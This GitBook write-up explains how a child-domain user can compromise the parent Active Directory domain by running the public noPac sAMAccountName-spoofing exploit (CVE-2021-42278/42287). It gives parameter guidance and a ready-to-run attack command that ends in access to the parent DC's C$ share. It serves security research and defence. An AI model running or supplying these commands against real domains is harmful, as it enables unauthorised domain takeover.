UI
  • ABOUT US
  • UNSAFE
    • sAMAccountName Spoofing in the Forest
    • Pass-the-Hash Attack Over Named Pipes Against ESET Server Security
    • Netcat Relay
    • Hiren's BootCD in the AD
    • Abusing LAPS
  • INLINE
    • Asena
    • Suyla
    • dcFinder
  • 0DAY
    • ADManager Plus Build < 7210 Elevation of Privilege Vulnerability (CVE-2024-24409)
    • Asp.Net Zero v12.3.0 - HTML Injection Leads To Open Redirect via Websockets (CVE-2023-48003)
    • ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure (CVE-2023-31492)
    • Multiple ManageEngine Applications Critical Information Disclosure Vulnerability
    • Thecus N4800Eco Nas Server Control Panel Comand Injection
    • ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
    • Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
    • KLOG Server (Authenticated) Command Injection (CVE-2021-3317)
    • Cokpit version 234 - Server Side Request Forgery (CVE-2020-35850)
    • KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
    • Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
    • Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
    • BRAdmin Professional 3.75 - Unquoted Service Path
Powered by GitBook
On this page
  • Description
  • Reference

Was this helpful?

  1. UNSAFE

sAMAccountName Spoofing in the Forest

Exploiting sAMAccountName spoofing (CVE-2021-42278 & CVE-2021-42287) from the child domain can led to compromise the parent domain

PreviousUNSAFENextPass-the-Hash Attack Over Named Pipes Against ESET Server Security

Last updated 1 year ago

Was this helpful?

Description

Parent domain can be compromised from a user of the child domain using the noPac.exe (sAMAccountName spoofing exploit) is written by cube0x0. I notice that he didn't refer example command to compromise the parent domain.

Forest Information

unsafe.local = parent domain

gotham.unsafe.local = child domain

user1 = user of the gotham domain

For above scenario, you must set -dc parameter as a domain controller of the parent domain without specifying -domain parameter because if you specify a parent domain name with the credentials of a child domain user, invalid credentials error occurs in the NetworkCredential class.

If you specify the child domain name, a machine account will be added to gotham.unsafe.local by the noPac exploit and it fails our objective. So NetworkCredential.argDomain should be empty. Username and password are enough to connect parent DC successfully. (trust relations) We can see this adding line 399.

The domain name that is required for adding a machine will be extracted from the specified DC name (line 421).

Commands
noPac.exe -user [child-user] -pass [pass] -dc [parent-dc] -mAccount [machine-name] -mPassword [machine-pass] -service cifs -ptt
dir \\parent-dc\c$
# Author: Metin Yunus Kandemir

Reference

https://github.com/cube0x0/noPac